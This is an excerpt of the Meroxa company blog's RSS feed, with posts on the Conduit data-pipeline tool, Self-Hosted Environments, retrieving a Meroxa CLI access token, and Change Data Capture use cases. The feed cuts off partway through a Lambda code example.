&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;tar&lt;/span&gt; zxvf conduit_0.1.0_Darwin_x86_64.tar.gz&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, from the very beginning, you’ll be able to open your web browser, navigate to&lt;code class=&quot;language-text&quot;&gt;[http://localhost:8080/ui/](http://localhost:8080/ui/)&lt;/code&gt; to start building pipelines.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ABZKgHs1CMgYsVv_fy6-jg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit ships with a UI for local development. Then, once you get data moving, there is much more for you to explore.&lt;/p&gt;
&lt;h3&gt;Why We Made Conduit?&lt;/h3&gt;
&lt;p&gt;At Meroxa, our vision is to enable developers to build streaming data applications without worrying about deploying and monitoring complex distributed infrastructure like Apache Kafka and Kafka Connect.&lt;/p&gt;
&lt;p&gt;But, to make those applications possible, you’ve got to be able to move between nodes in a directed acyclic graph (DAG) with minimal latency and using as few resources as possible.&lt;/p&gt;
&lt;p&gt;Not only that, we needed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;**Easy deployment:**With a large number of customers moving data within Meroxa’s infrastructure, any efficiencies start to compound, especially when running a managed service. (cough...cough JVM)&lt;/li&gt;
&lt;li&gt;**Allow for DevOps and Monitoring best practices:**We wanted to ship logs straight to Prometheus without dealing with intermediate agents. In the Java world, we would have had to use JMX, which comes with its own set of dependencies and potential failures.&lt;/li&gt;
&lt;li&gt;**An excellent connector developer experience:**Developing connectors should be consistent, straightforward, and familiar with modern languages.&lt;/li&gt;
&lt;li&gt;**A User Interface:**We wanted a baked-in user interface to aid local development. This also makes getting started super easy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;To control data movement with code:&lt;/strong&gt; We needed a tool-driven via config files, a REST API, or gRPC. Having the ability to use software to manage your data moment systems offers compelling use cases.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Be Open Source&lt;/strong&gt; — Licensing should be permissive (open-source, ftw!)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the end, we couldn’t find anything that met all of these requirements, so we embarked on creating our own.&lt;/p&gt;
&lt;p&gt;From a philosophical perspective, this functionality should be made available to all developers. We should all work toward a future where moving data within production architectures doesn’t prevent data-centric features from being built. Free data integration is what’s going to get us to the next generation of software.&lt;/p&gt;
&lt;h3&gt;What can you build today?&lt;/h3&gt;
&lt;p&gt;Today, you can build pipelines that move data from:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kafka to Postgres&lt;/li&gt;
&lt;li&gt;File to Kafka&lt;/li&gt;
&lt;li&gt;File to File&lt;/li&gt;
&lt;li&gt;PostgreSQL to Postgres&lt;/li&gt;
&lt;li&gt;PostgreSQL to Amazon S3&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We only started with these data sources, but there are many more coming down the pipeline (pun intended). If you have any ideas,&lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;we’d love to hear them&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, even with the connectors, we have today, you should start to think about and build the following use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sending messages to and from Kafka to other data stores.&lt;/li&gt;
&lt;li&gt;Storing changes of your PostgreSQL replication log in Amazon S3 for auditing.&lt;/li&gt;
&lt;li&gt;Streaming logs to Kafka.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are already using this behind the scenes at Meroxa. If you create a pipeline with Meroxa, it’s using Conduit.&lt;/p&gt;
&lt;h3&gt;What’s Next&lt;/h3&gt;
&lt;p&gt;We are&lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;building Conduit out in the open&lt;/a&gt;. It’s an ambitious project, but we think we have something pretty cool. I hope you&lt;a href=&quot;https://www.conduit.io/&quot;&gt;check it out&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here are your next steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chat with the Conduit team in the&lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Request features/ ask questions about Conduit in&lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Send bug reports to&lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;GitHub Issues&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Check out the&lt;a href=&quot;https://conduit-site.vercel.app/&quot;&gt;Conduit Documentation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Show us love on&lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing Self-Hosted Environments: Bringing Data Isolation to Your Cloud]]></title><description><![CDATA[Today, we’re excited to announce the Self-Hosted Environments Beta.]]></description><link>https://meroxa.com/blog/introducing-self-hosted-environments-bringing-data-isolation-to-your-cloud</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-self-hosted-environments-bringing-data-isolation-to-your-cloud</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Tue, 04 Jan 2022 16:34:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce the&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Self-Hosted Environments Beta&lt;/a&gt;. We’ve learned from our customers that with the need for data security and compliance on the rise, building and maintaining environments and dependencies to support their existing DevOps processes and workflows is a non-trivial matter.&lt;/p&gt;
&lt;p&gt;Currently, engineering teams must choose between speed and compliance. When building or modifying data infrastructure, this can mean lost time or potentially putting sensitive data at risk.&lt;/p&gt;
&lt;p&gt;Self-Hosted Environments can now be provisioned with Meroxa in an existing cloud provider with just a few steps. Environments play a key role by encapsulating settings in an isolated subnet where data application resources can exist and operate securely. By sequestering development and testing efforts in environments as part of the DevOps lifecycle, engineers mitigate impact risk on existing systems and customers.&lt;/p&gt;
&lt;p&gt;We’ve done the work to eliminate implementation complexity for our customers while still offering complete operational control over their data security, compliance, and performance needs.&lt;/p&gt;
&lt;h3&gt;Getting started&lt;/h3&gt;
&lt;p&gt;To get started,&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;sign-up for the Self-Hosted Environments Beta&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment.&lt;/p&gt;
&lt;p&gt;In the meantime, &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;request a demo of Meroxa&lt;/a&gt; to gain access to a Meroxa account.&lt;/p&gt;
&lt;p&gt;With Self-Hosted Environments, you get all the power and utility of the Meroxa Platform. Allowing easy creation and management of Resources, Connectors, and Pipelines through our Dashboard or CLI — all with your data securely isolated in your cloud.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*yoV-lAspmvCOrBStrhTJUA@2x.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Meroxa Platform performs a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa Platform for the control plane to ensure everything operates smoothly.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*iNTaOvc5RH1bt0tAt-j1lA.png&quot; alt=&quot;&quot;&gt;To provision your Self-Hosted Environment, you will need credentials from yourcloud provider with the appropriate permissions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*8vu0fyEpXIN3xqmWab71BQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Creating Self-Hosted Environments is made easy through our&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;. Simply name the environment, indicate the type, provider, and include the configuration that contains your cloud provider credentials. See our&lt;a href=&quot;https://docs.meroxa.com/platform/environments/overview&quot;&gt;documentation&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;p&gt;Once successfully provisioned, you are ready to start creating Resources, Pipelines, and Connectors to move your data within your Self-Hosted Environment.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*pGDwtWWQDOANkrO8UCGsDw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the dashboard, you have the option to indicate which environment you’d like to create a Resource or Pipeline for by selecting the environment in the dropdown. The default environment is ‘common’.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*GnT7uXoGBvvAk88-lPhi2Q.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;When using the CLI, you can indicate which environment you’d like to create your Resources or Pipelines by using the `env` tag followed by the environment name in the CLI command.&lt;/p&gt;
&lt;h3&gt;What’s supported&lt;/h3&gt;
&lt;p&gt;Self-Hosted Environments may be provisioned in the following Amazon Web Services (AWS) regions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-east-1&lt;/code&gt;(N. Virginia)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-east-2&lt;/code&gt;(Ohio)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-west-2&lt;/code&gt; (Oregon)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;ap-northeast-1&lt;/code&gt; (Tokyo)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;eu-central-1&lt;/code&gt; (Frankfurt)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We do not currently support the provisioning of environments within existing VPCs.&lt;/p&gt;
&lt;p&gt;Don’t see your cloud provider or preferred region? You can still&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;sign-up for the beta&lt;/a&gt; — we’d love to hear how we might best support your needs!&lt;/p&gt;
&lt;h3&gt;Learn more&lt;/h3&gt;
&lt;p&gt;Are you as excited about real-time data applications as we are? We’d love for you to take Self-Hosted Environments for a spin. &lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Sign-up for the beta&lt;/a&gt; today — we will be in touch with the next steps! For more details, see our &lt;a href=&quot;https://docs.meroxa.com/platform/environments/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Sign-up for the Self-Hosted Environments Beta&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can reach us directly at &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[How to Obtain a Meroxa Access Token]]></title><description><![CDATA[Step-by-step instructions on how to obtain a Meroxa access token. The Meroxa access token is needed to authenticate to the Meroxa API programmatically.]]></description><link>https://meroxa.com/blog/how-to-obtain-a-meroxa-access-token</link><guid isPermaLink="false">https://meroxa.com/blog/how-to-obtain-a-meroxa-access-token</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Mon, 06 Sep 2021 17:02:00 GMT</pubDate><content:encoded>&lt;p&gt;The Meroxa access token is needed to authenticate to the Meroxa API programmatically. For example, the token allows you to build pipelines with&lt;a href=&quot;https://docs.meroxa.com/platform/terraform&quot;&gt;Terraform&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To obtain a token, you must install the&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;. Then, follow these steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Log in to the CLI.&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Get token.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The&lt;a href=&quot;https://docs.meroxa.com/changelog/2021-08-24-meroxa-cli-v-1-1-0&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa config&lt;/code&gt;&lt;/a&gt; command allows you access details about your Meroxa environment.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/meroxa-config-e9e9504392621b4ea00d83b694ed8837.png&quot; alt=&quot;Meroxa Config Command&quot;&gt;&lt;/p&gt;
&lt;p&gt;For security, the output is obfuscated unless you use the&lt;code class=&quot;language-text&quot;&gt;--json&lt;/code&gt; command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Other Methods&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-obtain-meroxa-access-token#other-methods&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;If you&apos;re familiar with&lt;a href=&quot;https://stedolan.github.io/jq/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;jq&lt;/code&gt;&lt;/a&gt;, in one command, you can parse the JSON output and only print the Meroxa token:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; .config.access_token&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You could also add this to your&lt;code class=&quot;language-text&quot;&gt;.zshrc&lt;/code&gt; or&lt;code class=&quot;language-text&quot;&gt;.profile&lt;/code&gt; to always have it available in your environment.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;MEROXA_REFRESH_TOKEN&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;$(&lt;/span&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; .config.access_token&lt;span class=&quot;token variable&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Stream Your Database Changes with Change Data Capture: Part Two]]></title><description><![CDATA[Let’s discuss the use cases of CDC and look at the tools that help you add CDC into your architecture.]]></description><link>https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-two</link><guid isPermaLink="false">https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-two</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 01 Sep 2021 20:11:00 GMT</pubDate><content:encoded>&lt;p&gt;This is part two of a series on Change Data Capture (CDC). In part one,&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;we defined change data capture, explored how data is captured, and the pros and cons of each capturing method&lt;/a&gt;. In this article, let’s discuss the use cases of CDC and look at the tools that help you add CDC into your architecture.&lt;/p&gt;
&lt;p&gt;Change Data Capture helps enable&lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;event-driven applications&lt;/a&gt;. It allows applications to listen for changes to a database, data warehouse, etc., and act upon those changes.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*JbVsh5uBanFyqEWYH8fxXw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;At a high level, here are the use cases and architectures that arise from acting on data changes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Extract, Transform, Load (ETL):&lt;/strong&gt; Capturing every change of one datastore and applying these changes to another allows for replication (one-time sync) and mirroring (continuous syncing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration and Automation:&lt;/strong&gt; The action taken on data change events can automate tasks, trigger workflows, or even execute cloud functions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;History:&lt;/strong&gt; When performing historical analysis on a dataset, having the current state of the data and all past changes gives you complete information for a higher fidelity analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Alerting:&lt;/strong&gt; Most of the time, applications send an event to a user whenever the data they care about changes. CDC can be the trigger for real-time alerting systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s explore.&lt;/p&gt;
&lt;h3&gt;Extract, Transform, Load&lt;/h3&gt;
&lt;p&gt;As of date, one of the most common use cases for CDC is Extract, Transform, Load (ETL). ETL is a process in which you are capturing data from one source (extract), processing it in some way (transform), and sending it to a destination (load).&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*m-ABnhybW0FaefsjpVWYbg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Data replication (one-time sync) and mirroring (continuous replication) are great examples of ETL processes. ETL is an umbrella term that encompasses very different use cases such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ingesting data from a database into a data warehouse to run analytic queries without impacting production.&lt;/li&gt;
&lt;li&gt;Keeping caches and search index systems up-to-date&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Not only can CDC help solve these use cases, but it’s also the best way to solve these problems. For example, to mirror data to a data warehouse, you must capture and apply any&lt;em&gt;changes&lt;/em&gt; as they happen to the source database. As discussed with&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;Streaming Replication Logs&lt;/a&gt; in part one of the series, CDC is used by databases to keep standby instances up-to-date for failover because it’s effective and scalable. When tapping into these events in a wider architecture, your data warehouse can be as up-to-date as a standby database instance used for disaster recovery.&lt;/p&gt;
&lt;p&gt;Keeping&lt;a href=&quot;https://en.wikipedia.org/wiki/Cache_(computing)&quot;&gt;caches&lt;/a&gt; and search index systems up-to-date are also ETL problems and great CDC use cases. Large applications created today are comprised of many different data stores. For example, certain architectures will leverage Postgres, Redis, and Elasticsearch as a relational database, caching layer, and search engine. All are systems of record designed for specific data use cases, but data needs to be mirrored in each store.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Xt0ux3ZyEjSi65HzodLkNQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;You never want a user to search for a product and then find out it longer exists. Stale caches and search indexes lead to horrible user experiences. CDC can be used to build data pipelines that keep these stores in sync with their upstream dependencies.&lt;/p&gt;
&lt;p&gt;In theory, a single application could write to Postgres, Redis, and Elasticsearch simultaneously, but “Dual Writes” can be tough to manage and can lead to out-of-sync systems. CDC offers a stronger, easier-to-maintain implementation. Instead of adding the logic to update indexes and caches to a single monolithic application, one could create an event-driven microservice that can be built, maintained, improved, and deployed independently from user-facing systems. This microservice can keep indexes and caches up to date to ensure users operate on the most relevant data.&lt;/p&gt;
&lt;h3&gt;Integration and Automation&lt;/h3&gt;
&lt;p&gt;The rise of SaaS has exploded the number of tools that generate data or need to be updated with data. CDC can provide a better model for keeping Salesforce, Hubspot, etc., up to date and allow automation of business logic that needs to respond to those data changes.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*7VyCMIWSEVVLoIcgHgaJpQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Each of the use cases we described above sends data to a specific destination. However, the most powerful destination is a cloud function. Capturing data changes and triggering a cloud function can be used to perform every use case mentioned (and not) in this article.&lt;/p&gt;
&lt;p&gt;Cloud functions have grown tremendously because there are no servers to maintain; they automatically scale and are simple to use and deploy. This popularity and usefulness have been apparent and proven in architectures like the JAMStack. CDC fits perfectly with this architecture model.&lt;/p&gt;
&lt;p&gt;Today, Cloud functions are triggered by an event. This event could be when a&lt;a href=&quot;https://docs.aws.amazon.com/lambda/latest/dg/with-s3-example.html&quot;&gt;file is uploaded to Amazon S3&lt;/a&gt; or an HTTP request. However, as you might have guessed, this trigger event could be emitted by a CDC system.&lt;/p&gt;
&lt;p&gt;For example, here is an AWS Lambda Function to accept a data change event and&lt;a href=&quot;https://www.algolia.com/doc/&quot;&gt;perform Algolia search indexing&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; algoliasearch &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;algoliasearch&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX_NAME&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
 
exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function-variable function&quot;&gt;handler&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;event&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;EVENT: \\n&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;event&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; request &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; event&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;request&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
 
  &lt;span class=&quot;token comment&quot;&gt;// Accessing the Data Record&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;//  &lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; body &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Buffer&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;from&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;request&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;body&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;base64&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
